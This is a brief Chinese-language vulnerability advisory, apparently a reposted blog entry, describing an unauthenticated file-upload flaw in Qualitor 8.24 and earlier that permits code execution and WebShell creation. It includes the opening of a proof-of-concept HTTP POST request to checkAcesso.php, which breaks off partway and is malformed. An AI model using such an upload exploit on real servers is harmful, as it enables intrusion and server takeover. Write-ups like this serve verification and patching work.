本文共 591 字,大约阅读时间需要 1 分钟。
0x01 漏洞概述
Qualitor 8.24及之前版本存在严重的文件上传漏洞,这个漏洞未经身份验证,攻击者可利用此漏洞执行代码,创建WebShell,进一步控制服务器权限。该漏洞属于高风险级别,建议及时修复。
0x02 复现环境
此漏洞已被确认在以下环境中存在: - **Product Name**: Qualitor-Web - **Version Affected**: 8.24及之前版本
0x03 漏洞复现
以下是漏洞的PoC(Proof of Concept)代码,用于验证和分析: ```http POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849----------------------------- Content-Disposition: form-data; name="idtipo"2 ----------------------------- Content-Disposition: form-data; name="nmfilestorage" -
转载地址:http://wuxfk.baihongyu.com/